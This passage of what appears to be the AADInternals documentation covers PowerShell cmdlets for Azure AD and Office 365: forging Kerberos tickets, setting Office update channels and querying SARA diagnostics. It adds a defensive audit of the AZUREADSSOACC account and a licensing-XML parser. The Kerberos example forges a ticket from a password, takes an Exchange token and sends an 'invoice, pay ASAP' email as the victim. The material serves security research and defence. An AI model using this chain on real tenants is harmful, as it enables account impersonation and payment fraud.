ErrorMessage : 
Exists       : True
IsSuccessful : True

New-AADIntKerberosTicket

Since version 0.2.6
This function creates a Kerberos ticket with the given user details and the server (usually AZUREADSSOACC) password. Uses only the user’s SID and the server password.

The user SID can be given as a SID object, SID string, or UserPrincipalName (UPN). If a UPN is given, the SID is searched from AD or AAD. For AD, the user running the command needs to have read access to AD. For AAD, an access token for Azure AD Graph needs to be given.

Note! The Kerberos ticket is valid only for a couple of minutes!

Example:

# Create a Kerberos ticket
$kt=New-AADIntKerberosTicket -ADUserPrincipalName user@company.com -Password "mypassword"

# Get an access token for Exchange Online
$et=Get-AADIntAccessTokenForEXO -KerberosTicket $kt -Domain company.com

# Send an email using Outlook API
Send-AADIntOutlookMessage -AccessToken $et -Recipient "accounting@company.com" -Subject "Invoice" -Message "Pay the attached invoice <b>ASAP!</b>"
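
Set-AADIntDesktopSSO and New-AADIntKerberosTicket above both hinge on one secret: the password of the AZUREADSSOACC computer account. A ticket built offline from a SID and that password, as the function above does, never touches a domain controller, so the controllable signals are how old that password is and who last reset it. The audit below is an added example, not part of AADInternals; it assumes the ActiveDirectory module and read access to a domain controller's Security log (run it on the DC), and the 30-day threshold is an assumption.

```powershell
# Added audit, not part of AADInternals. Needs the ActiveDirectory module and
# read access to a domain controller's Security log (run it on the DC). A ticket
# built offline from the SID and the AZUREADSSOACC password, as the function above
# does, leaves no 4769 on the DC, so the controllable signal is the age of that
# password and who last reset it. The 30-day threshold is an assumption.

function Get-DesktopSsoAuditReport {
    param(
        [string] $AccountName        = 'AZUREADSSOACC',
        [int]    $MaxPasswordAgeDays = 30,
        [int]    $MaxEvents          = 2000
    )
    $findings = @()

    # Age of the SSO computer account password: the key that forged tickets are built from
    $acct    = Get-ADComputer -Identity $AccountName -Properties PasswordLastSet
    $ageDays = [int]((Get-Date) - $acct.PasswordLastSet).TotalDays
    if ($ageDays -gt $MaxPasswordAgeDays) {
        $findings += "$AccountName password was last set $ageDays days ago ($($acct.PasswordLastSet)); roll it"
    }

    # Password resets and account changes for the SSO account:
    # 4724 = an attempt was made to reset an account's password, 4742 = computer account changed
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4724, 4742 } `
        -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        # Computer account names carry a trailing $ in the event data
        if ($data['TargetUserName'] -eq "$AccountName`$") {
            $findings += ("Event {0} at {1}: {2} changed by {3}\{4}" -f
                $e.Id, $e.TimeCreated, $AccountName, $data['SubjectDomainName'], $data['SubjectUserName'])
        }
    }

    [pscustomobject]@{
        Account         = $acct.SamAccountName
        PasswordLastSet = $acct.PasswordLastSet
        PasswordAgeDays = $ageDays
        Findings        = $findings
    }
}

# Usage: Get-DesktopSsoAuditReport | Format-List
```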

Client functions

Get-AADIntOfficeUpdateBranch

Since version 0.2.4
This function shows the update branch (currently called channel) of Office.

Example:

# Get Office update branch
Get-AADIntOfficeUpdateBranch

Output:

Update branch: Current

Set-AADIntOfficeUpdateBranch

Since version 0.2.4
This function sets the update branch (currently called channel) of Office. Must run as administrator.

Branch                Channel                 Notes
InsiderFast                                   Weekly builds, not generally supported
FirstReleaseCurrent                           Preview of the current
Current               Monthly                 Monthly updates
FirstReleaseDeferred  Semi-Annual (Targeted)  Preview of the deferred (March and September)
Deferred              Semi-Annual             Semi-annual updates (January and July)
DogFood                                       Only for Microsoft employees

Example:

# Get Office update branch
Set-AADIntOfficeUpdateBranch -UpdateBranch InsiderFast

Output:

Update branch: InsiderFast

Support and Recovery Assistant (SARA)

Get-AADIntSARAUserInfo

Since version 0.2.4
This function gets user information using the Microsoft Support and Recovery Assistant (SARA) API. Can help in diagnostics and troubleshooting. The analysis is run on the MS diagnostic server and can take up to 30 seconds.

Example:

# Get user information
$at=Get-AADIntAccessTokenForSARA
Get-AADIntSARAUserInfo -AccessToken $at

Output:

Retrieving information..
Retrieving information..
Retrieving information..

AnalyzerName          : AnalysisRule, Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.GetUserAnalyzer, Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets, Version=16.0.3144.0, Culture=
                        neutral, PublicKeyToken=31bf3856ad364e35
AnalyzerDesc          : Attempting to get information about user "user@company.com".
StartTime             : 2019-07-08T12:29:40.4911399Z
Duration              : 00:00:51.1166849
CoreDuration          : 00:00:51.1166849
WaitingDuration       : 00:00:00
TotalChildrenDuration : 00:00:00
TotalWaitingDuration  : 00:00:00
ParentId              : 00000000-0000-0000-0000-000000000000
Value                 : true
ResultTitle           : Extracting information about Office 365 user is completed.
ResultTitleId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.StringsGetUserComplete
UserMessage           : Successfully got the user information for "user@company.com".
UserMessageId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.StringsGetUserSuccessDesc
AdminMessage          : 
SupportMessage        : 
IsMessageShown        : False
GenericInfo           : 
Severity              : 2
OverridesChildren     : False
ProblemId             : 00000000-0000-0000-0000-000000000000
TimeCached            : 0001-01-01T00:00:00
SaraSymptomId         : 00000000-0000-0000-0000-000000000000
SaraWorkflowRunId     : 00000000-0000-0000-0000-000000000000
SaraSymptomRunId      : 00000000-0000-0000-0000-000000000000
SaraSessionId         : 00000000-0000-0000-0000-000000000000
Id                    : d5b4c239-7619-4367-9ccb-e9fe2fe01e23

DisplayName               : Demo USer
FirstName                 : Demo
Guid                      : 67a93665-decb-4058-b42a-271d41c47c61
Id                        : 
Identity                  : EURP185A001.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/demoo365life4.onmicrosoft.com/AdminO365life
IsDirSynced               : False
IsValid                   : True
LastName                  : User
MicrosoftOnlineServicesID : user@company.com
Name                      : DemoUser
NetID                     : 401320004BA7A415
RecipientType             : UserMailbox
RecipientTypeDetails      : UserMailbox
UserPrincipalName         : user@company.com
WindowsEmailAddress       : user@company.com
WindowsLiveID             : user@company.com
IsHybridTenant            : False
Forest                    : EURP185.PROD.OUTLOOK.COM

Get-AADIntSARATenantInfo

Since version 0.2.4
This function gets tenant information using the Microsoft Support and Recovery Assistant (SARA) API. Can help in diagnostics and troubleshooting. The analysis is run on the MS diagnostic server but should take only a second or two.

Example:

# Get tenant information
$at=Get-AADIntAccessTokenForSARA
Get-AADIntSARATenantInfo -AccessToken $at

Output:

Retrieving information..

AnalyzerName          : AnalysisRule, Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo.TenantUserInfoAnalyzer, Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo, Version=16.0.3144.0, Culture=neu
                        tral, PublicKeyToken=31bf3856ad364e35
AnalyzerDesc          : Checking your tenant and account information.
StartTime             : 2019-07-08T12:31:06.1602586Z
Duration              : 00:00:00.6250818
CoreDuration          : 00:00:00.6250818
WaitingDuration       : 00:00:00
TotalChildrenDuration : 00:00:00
TotalWaitingDuration  : 00:00:00
ParentId              : 00000000-0000-0000-0000-000000000000
Value                 : true
ResultTitle           : The licenses of your tenant and account are all good!
ResultTitleId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo.StringsGetTenantInfoSuccess
UserMessage           : 
UserMessageId         : 
AdminMessage          : 
SupportMessage        : <Setup><ProductId>O365ProPlusRetail</ProductId><ReleaseTrack>False</ReleaseTrack></Setup>
IsMessageShown        : False
GenericInfo           : User Puid is not null or empty.OrgIg_User<TenantUserInfo><IsLicensed>True</IsLicensed><ProvisioningStatus>PendingInput</ProvisioningStatus><PreferredLanguage>en</PreferredLanguage/>
                        <ValidationStatus>Healthy</ValidationStatus><ReleaseTrack>Other</ReleaseTrack><LicenseInformations><LicenseInformation><SKUPartNumber>SPE_E5</SKUPartNumber><ServiceStatus><ServiceTy
                        pe>Exchange</ServiceType><ServiceName>INFORMATION_BARRIERS</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Micro
                        softKaizala</ServiceType><ServiceName>KAIZALA_STANDALONE</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Bing</S
                        erviceType><ServiceName>MICROSOFT_SEARCH</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><
                        ServiceName>PREMIUM_ENCRYPTION</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>WhiteboardServices</ServiceType><ServiceName>
                        WHITEBOARD_PLAN3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MIP_S_CLP2</ServiceName>
                        <ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MIP_S_CLP1</ServiceName><ProvisioningStatus>Success</P
                        rovisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MYANALYTICS_P2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Servic
                        eStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>PAM_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><Se
                        rviceType>AzureAdvancedThreatAnalytics</ServiceType><ServiceName>ATA</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>To-Do<
                        /ServiceType><ServiceName>BPOS_S_TODO_3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>ProcessSimple</ServiceType><ServiceN
                        ame>FLOW_O365_P3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>PowerAppsService</ServiceType><ServiceName>POWERAPPS_O365_P
                        3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>OfficeForms</ServiceType><ServiceName>FORMS_PLAN_E5</ServiceName><Provisio
                        ningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Adallom</ServiceType><ServiceName>ADALLOM_S_STANDALONE</ServiceName><ProvisioningStatus>Disabled</
                        ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MicrosoftStream</ServiceType><ServiceName>STREAM_O365_E5</ServiceName><ProvisioningStatus>Success</ProvisioningStatus>
                        </ServiceStatus><ServiceStatus><ServiceType>Deskless</ServiceType><ServiceName>Deskless</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><
                        ServiceType>Exchange</ServiceType><ServiceName>THREAT_INTELLIGENCE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Teamspace
                        API</ServiceType><ServiceName>TEAMS1</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>WindowsDefenderATP</ServiceType><Servic
                        eName>WINDEFATP</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Windows</ServiceType><ServiceName>WIN10_PRO_ENT_SUB</Service
                        Name><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM2</ServiceName><ProvisioningStatus>
                        Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM_P2</ServiceName><ProvisioningStatus>Disabled</Provis
                        ioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceSta
                        tus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_ENTERPRISE</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><Se
                        rviceType>MultiFactorService</ServiceType><ServiceName>MFA_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</Ser
                        viceType><ServiceName>INTUNE_A</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>
                        AAD_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>YammerEnterprise</ServiceType><ServiceName>YAMMER_ENTERPRISE</S
                        erviceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Sway</ServiceType><ServiceName>SWAY</ServiceName><ProvisioningStatus>Success</
                        ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SharePoint</ServiceType><ServiceName>SHAREPOINTWAC</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Serv
                        iceStatus><ServiceStatus><ServiceType>SharePoint</ServiceType><ServiceName>SHAREPOINTENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><Service
                        Status><ServiceType>ProjectWorkManagement</ServiceType><ServiceName>PROJECTWORKMANAGEMENT</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus
                        ><ServiceType>MicrosoftOffice</ServiceType><ServiceName>OFFICESUBSCRIPTION</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>M
                        icrosoftCommunicationsOnline</ServiceType><ServiceName>MCOSTANDARD</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Microsoft
                        CommunicationsOnline</ServiceType><ServiceName>MCOMEETADV</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MicrosoftCommunica
                        tionsOnline</ServiceType><ServiceName>MCOEV</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceNa
                        me>LOCKBOX_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</ServiceType><ServiceName>INTUNE_O365</ServiceName
                        ><ProvisioningStatus>PendingActivation</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_S_ENTERPRISE</ServiceName><Provisi
                        oningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_ANALYTICS</ServiceName><ProvisioningStatus>Success</P
                        rovisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EQUIVIO_ANALYTICS</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Ser
                        viceStatus><ServiceStatus><ServiceType>PowerBI</ServiceType><ServiceName>BI_AZURE_P2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><Ser
                        viceType>Exchange</ServiceType><ServiceName>ATP_ENTERPRISE</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Adall
                        om</ServiceType><ServiceName>ADALLOM_S_O365</ServiceName><ProvisioningStatus>PendingInput</ProvisioningStatus></ServiceStatus></LicenseInformation><LicenseInformation><SKUPartNumber
                        >EMSPREMIUM</SKUPartNumber><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_S_FOUNDATION</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningSta
                        tus></ServiceStatus><ServiceStatus><ServiceType>AzureAdvancedThreatAnalytics</ServiceType><ServiceName>ATA</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStat
                        us><ServiceStatus><ServiceType>Adallom</ServiceType><ServiceName>ADALLOM_S_STANDALONE</ServiceName><ProvisioningStatus>PendingInput</ProvisioningStatus></ServiceStatus><ServiceStatu
                        s><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline<
                        /ServiceType><ServiceName>RMS_S_PREMIUM</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>
                        RMS_S_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</ServiceType><ServiceName>INTUNE_A</ServiceName><Provis
                        ioningStatus>PendingInput</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM_P2</ServiceName><ProvisioningStatus
                        >Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MultiFactorService</ServiceType><ServiceName>MFA_PREMIUM</ServiceName><ProvisioningStatus>Success</Provision
                        ingStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceS
                        tatus></LicenseInformation></LicenseInformations></TenantUserInfo>
Severity              : 2
OverridesChildren     : False
ProblemId             : 00000000-0000-0000-0000-000000000000
TimeCached            : 0001-01-01T00:00:00
SaraSymptomId         : 00000000-0000-0000-0000-000000000000
SaraWorkflowRunId     : 00000000-0000-0000-0000-000000000000
SaraSymptomRunId      : 00000000-0000-0000-0000-000000000000
SaraSessionId         : 00000000-0000-0000-0000-000000000000
Id                    : 81157ffa-d946-4bf8-8d6e-a391b96e4bf6
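The LicenseInformation section of the TenantUserInfo XML above is hard to read as a single wrapped string. The following PowerShell snippet is an added example (not part of AADInternals or the original post) that parses such a document and lists, per SKU, which service plans are not yet fully provisioned; this is the quickest way to spot plans stuck in PendingInput or PendingProvisioning when reviewing a user's licensing. The sample XML is constructed to mirror the element structure shown in the output (the assumption being that the real document uses the same element names; XPath `local-name()` is used so that a namespace on the root element, if present, does not matter):

```powershell
# Added example: summarise ProvisioningStatus per service plan from a
# TenantUserInfo XML document. The XML below is constructed for the demo and
# only copies the structure seen in the page's output; with real data, pass the
# TenantUserInfo string returned by the cmdlet instead.
$sampleXml = @"
<TenantUserInfo>
  <LicenseInformations>
    <LicenseInformation>
      <SKUPartNumber>EMSPREMIUM</SKUPartNumber>
      <ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_S_FOUNDATION</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus>
      <ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM_P2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus>
      <ServiceStatus><ServiceType>SCO</ServiceType><ServiceName>INTUNE_A</ServiceName><ProvisioningStatus>PendingInput</ProvisioningStatus></ServiceStatus>
    </LicenseInformation>
  </LicenseInformations>
</TenantUserInfo>
"@

function Get-LicenseServiceStatus {
    param(
        [Parameter(Mandatory)][string]$TenantUserInfoXml,
        # When set, only plans whose ProvisioningStatus is not "Success" are returned
        [switch]$NotProvisionedOnly
    )
    $xml = [xml]$TenantUserInfoXml

    # local-name() keeps the XPath independent of any default namespace on the root
    foreach ($lic in $xml.SelectNodes("//*[local-name()='LicenseInformation']")) {
        $sku = $lic.SelectSingleNode("*[local-name()='SKUPartNumber']").InnerText
        foreach ($svc in $lic.SelectNodes("*[local-name()='ServiceStatus']")) {
            $status = $svc.SelectSingleNode("*[local-name()='ProvisioningStatus']").InnerText
            if ($NotProvisionedOnly -and $status -eq 'Success') { continue }
            [pscustomobject]@{
                SKU                = $sku
                ServiceType        = $svc.SelectSingleNode("*[local-name()='ServiceType']").InnerText
                ServiceName        = $svc.SelectSingleNode("*[local-name()='ServiceName']").InnerText
                ProvisioningStatus = $status
            }
        }
    }
}

# Usage: list only the plans that still need attention
Get-LicenseServiceStatus -TenantUserInfoXml $sampleXml -NotProvisionedOnly | Format-Table -AutoSize
```

Run without `-NotProvisionedOnly` to get the full per-plan table for every SKU in the document; the objects pipe cleanly into `Export-Csv` or `Where-Object` for further filtering.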
About Dr Nestori Syynimaa
Dr Syynimaa works as the CIO of eight cities and municipalities surrounding Tampere, the largest inland city in the Nordic countries. He also runs his own consultancy, Gerenios. Before moving to his current position, Dr Syynimaa worked as a consultant, trainer, and university lecturer for almost 20 years. He is a regular speaker on Office 365 and Azure security at scientific and professional conferences. Dr Syynimaa holds the MCSA (Office 365) and is a Microsoft Certified Trainer.